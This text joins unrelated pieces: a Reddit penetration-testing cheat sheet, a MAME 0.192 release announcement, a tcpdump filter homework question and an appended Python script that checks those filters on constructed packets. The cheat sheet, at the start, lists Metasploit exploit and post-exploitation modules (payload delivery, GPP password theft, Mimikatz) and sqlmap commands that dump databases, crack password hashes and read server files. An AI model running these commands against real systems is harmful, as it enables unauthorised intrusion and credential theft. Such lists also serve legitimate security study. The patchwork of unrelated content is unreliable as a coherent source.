Auxilary Metasploit Modules

use auxiliary/scanner/http/dir_scanner - Metasploit HTTP directory scanner
use auxiliary/scanner/http/jboss_vulnscan - Metasploit JBOSS vulnerability scanner
use auxiliary/scanner/mssql/mssql_login - Metasploit MSSQL Credential Scanner
use auxiliary/scanner/mysql/mysql_version - Metasploit MySQL Version Scanner
use auxiliary/scanner/oracle/oracle_login - Metasploit Oracle Login Module

Metasploit Powershell Modules

use exploit/multi/script/web_delivery - Metasploit powershell payload delivery module
post/windows/manage/powershell/exec_powershell - Metasploit upload and run powershell script through a session
use exploit/multi/http/jboss_maindeployer - Metasploit JBOSS deploy
use exploit/windows/mssql/mssql_payload - Metasploit MSSQL payload

Post Exploit Windows Metasploit Modules

run post/windows/gather/win_privs - Metasploit show privileges of current user
use post/windows/gather/credentials/gpp - Metasploit grab GPP saved passwords
load mimikatz -> wdigest - Metasploit load Mimikatz
run post/windows/gather/local_admin_search_enum - Identify other machines that the supplied domain user has administrative access to

CISCO IOS Commands

A collection of useful Cisco IOS commands.

enable - Enters enable mode
conf t - Short for configure terminal
(config)# interface fa0/0 - Configure FastEthernet 0/0
(config-if)# ip addr 0.0.0.0 255.255.255.255 - Add ip to fa0/0
(config-if)# line vty 0 4 - Configure vty line
(config-line)# login - Cisco set telnet password
(config-line)# password YOUR-PASSWORD - Set telnet password

show running-config - Show running config loaded in memory

show startup-config - Show startup config

show version - show cisco IOS version

show session - display open sessions

show ip interface - Show network interfaces

show interface e0 - Show detailed interface info

show ip route - Show routes

show access-lists - Show access lists

dir file systems - Show available files

dir all-filesystems - File information

dir /all - Show deleted files

terminal length 0 - No limit on terminal output

copy running-config tftp - Copies running config to tftp server

copy running-config startup-config - Copy startup-config to running-config

Cryptography

Hash Lengths

MD5 Hash Length - 16 Bytes
SHA-1 Hash Length - 20 Bytes
SHA-256 Hash Length - 32 Bytes
SHA-512 Hash Length - 64 Bytes

SQLMap Examples

sqlmap -u http://meh.com --forms --batch --crawl=10 --cookie=jsessionid=54321 --level=5 --risk=3 - Automated sqlmap scan
sqlmap -u TARGET -p PARAM --data=POSTDATA --cookie=COOKIE --level=3 --current-user --current-db --passwords --file-read="/var/www/blah.php" - Targeted sqlmap scan
sqlmap -u "http://meh.com/meh.php?id=1" --dbms=mysql --tech=U --random-agent --dump - Scan url for union + error based injection with mysql backend and use a random user agent + database dump
sqlmap -o -u "http://meh.com/form/" --forms - sqlmap check form for injection
sqlmap -o -u "http://meh/vuln-form" --forms -D database-name -T users --dump - sqlmap dump and crack hashes for table users on database-name
submitted by LubuntuFU to Kalilinux

MAME 0.192

Even if you’re still feeling burned from Singles’ Day, Thanksgiving, and/or Black Friday, MAME 0.192 is here, and there’s plenty packed into this update. At long last, the MCU for Ping Pong King is simulated, making the game playable, and Flower now runs better than it ever did. Taito’s abstract maze game Marine Date is also emulated better than ever, although there are still some issues with collision detection. We’ve got newly dumped prototypes, including a prototype of Battlecry, and a more complete version of Grudge Match that appears to come from a location test in Italy. Many of the Aristocrat MK5 gambling machines have been redumped so the ROM checksums pass and they boot. Missing graphics in the Merit Megatouch games have been fixed.
But we know that rumours about the next part of this announcement have made lots of arcade fans excited: IGS PGM2 software is showing signs of life. I’m sure at least some of you are wondering how this was achieved. Usual suspects Morten Shearman Kirkegaard and Peter Wilhelmsen (recently featured here in connection to their success in dumping Gaelco protection programs) have built another FPGA-based rig that allowed them to dump the internal programs from the ARM CPUs for Oriental Legend 2 and Knights of Valour 2 New Legend. On top of this, there are some nice performance improvements to MAME’s MPEG audio decoding that should benefit other systems as well.
In computer system emulation, we’ve got a number of graphical fixes for FM Towns, heaps of improvements for the Tatung Einstein, No-Slot Clock support for the Apple //e family, and support for some Brazilian CoCo clones from Prológica and Codimex. There are some big updates to the PC software lists, too. The ACI Destiny Prodigy, Mephisto RISC 1MB and Mephisto RISC II chess computers are now working. Finally, the Interpro drivers have numerous improvements, including preliminary keyboard/video support.
That’s just scratching the surface – there are far more bug fixes, newly dumped systems and performance improvements. You can get the source or Windows binaries from the download page.

MAMETesters Bugs Fixed

New working machines

New working clones

Machines promoted to working

Clones promoted to working

New machines marked as NOT_WORKING

New clones marked as NOT_WORKING

New working software list additions

Software list items promoted to working

New NOT_WORKING software list additions

Translations added or modified

Source Changes

submitted by cuavas to MAME


Are my TCPdump filters correct?

I am working on learning to use tcpdump filters without keywords and I think I am doing a pretty good job with these, but after trying to check my answers online I am thinking that I have a few of them slightly wrong, though I am not exactly sure. I was hoping that someone could help and explain why my filter is wrong.
Full disclosure: I haven't tried any of the filters out, since I am trying to write them correctly before I test them on real packets. My exam won't allow me access to testing the filters before I submit them.
  1. Find all of the packets containing ONLY a "SYN" flag
    tcpdump -n -r testfile.pcap 'tcp[13] = 2' or should it be 'tcp[13] 2!=0'? I thought that if it equals 2 the only way for that to happen was if in the binary that bit was set to 1 and then it equals 2 in decimal.
  2. Find all of the packets containing "FIN ACK" flags.
    tcpdump -n -r testfile.pcap 'tcp[13] = 17' Same thing here, where in binary it would equal 17 with the 5th and 1st bits set to 1?
  3. Find all DNS packets.
    tcpdump -n -r testfile.pcap 'udp[0:2] = 0x35 & upd[2:2] = 0x35' To capture traffic both ways I need source and destination set to DNS?
  4. Find the ICMP Echo requests ONLY.
    tcpdump -n -r testfile.pcap 'icmp[0] = 8' This one seemed pretty straightforward to me.
  5. Find any packets that have TCP options.
    tcpdump -n -r testfile.pcap 'tcp[20:4] > 0' This one should also work? Any set options would make it greater than 0.
submitted by ITBry to networking
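As an added example (my own code, not the poster's and not part of tcpdump), the script below builds constructed IPv4/TCP/UDP/ICMP packets and evaluates the byte-offset expressions from the post against them, so the difference between `tcp[13] = 2` and `tcp[13] & 2 != 0`, or between `tcp[20:4] > 0` and a test on the TCP data-offset field (`tcp[12] & 0xf0 > 0x50`), can be checked offline without a capture. Packet contents, ports and addresses are constructed placeholders; all offsets assume a 20-byte IPv4 header, which is what `tcpdump`'s `tcp[N]`/`udp[N]`/`icmp[N]` indexing skips over.

```python
import struct
# Constructed sample packets (not from any capture): 20-byte IPv4 header + transport header.
# tcpdump's tcp[N], udp[N], icmp[N] index from the start of the transport header, so each
# lambda in FILTERS receives exactly those bytes.

def ipv4(proto):
    # version 4, IHL 5 words, TTL 64, given protocol number, placeholder 10.0.0.x addresses
    return struct.pack("!BBHHHBBH4s4s", 0x45, 0, 0, 0, 0, 64, proto, 0,
                       bytes([10, 0, 0, 1]), bytes([10, 0, 0, 2]))

def tcp(flags, words=5, options=b""):
    # ports, seq, ack, data offset (header length in 32-bit words) << 4, flags, window, csum, urg
    return struct.pack("!HHIIBBHHH", 40000, 80, 0, 0, words << 4, flags, 65535, 0, 0) + options

def udp(sport, dport):
    return struct.pack("!HHHH", sport, dport, 8, 0)

def icmp(icmp_type):
    return struct.pack("!BBHHH", icmp_type, 0, 0, 0, 0)

def be(b):
    return int.from_bytes(b, "big")   # unsigned big-endian value, like tcpdump's tcp[N:len]

# Filter expression (tcpdump syntax) -> test on (IP protocol number, transport-layer bytes).
FILTERS = {
    "tcp[13] = 2":                    lambda p, t: p == 6 and t[13] == 2,            # SYN only
    "tcp[13] & 2 != 0":               lambda p, t: p == 6 and (t[13] & 2) != 0,      # SYN set
    "tcp[13] = 17":                   lambda p, t: p == 6 and t[13] == 17,           # FIN+ACK only
    "udp[0:2] = 53 or udp[2:2] = 53": lambda p, t: p == 17 and 53 in (be(t[0:2]), be(t[2:4])),
    "icmp[0] = 8":                    lambda p, t: p == 1 and t[0] == 8,             # echo request
    "tcp[12] & 0xf0 > 0x50":          lambda p, t: p == 6 and (t[12] & 0xF0) > 0x50, # offset > 5 words
    "tcp[20:4] > 0":                  lambda p, t: p == 6 and len(t) >= 24 and be(t[20:24]) > 0,
}

SAMPLES = {
    "syn":       ipv4(6) + tcp(0x02),
    "syn_ack":   ipv4(6) + tcp(0x12),
    "fin_ack":   ipv4(6) + tcp(0x11),
    "syn_mss":   ipv4(6) + tcp(0x02, 6, b"\x02\x04\x05\xb4"),   # MSS option, 24-byte header
    "ack_data":  ipv4(6) + tcp(0x10) + b"GET / HTTP/1.1",       # 20-byte header, then payload
    "dns_query": ipv4(17) + udp(51000, 53),
    "dns_reply": ipv4(17) + udp(53, 51000),
    "ping":      ipv4(1) + icmp(8),
    "pong":      ipv4(1) + icmp(0),
}

def matches(expr):
    # Sorted names of the constructed packets selected by the named filter expression.
    test = FILTERS[expr]
    return sorted(name for name, pkt in SAMPLES.items()
                  if test(pkt[9], pkt[(pkt[0] & 0x0F) * 4:]))   # honour the IHL field

if __name__ == "__main__":
    for expr in FILTERS:
        print(f"{expr:32} {matches(expr)}")
```

The last two entries show why the data-offset test is the reliable one: `tcp[20:4] > 0` also selects `ack_data`, whose header is 20 bytes and whose bytes 20..23 are payload, while `tcp[12] & 0xf0 > 0x50` selects only the packet that actually carries options.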

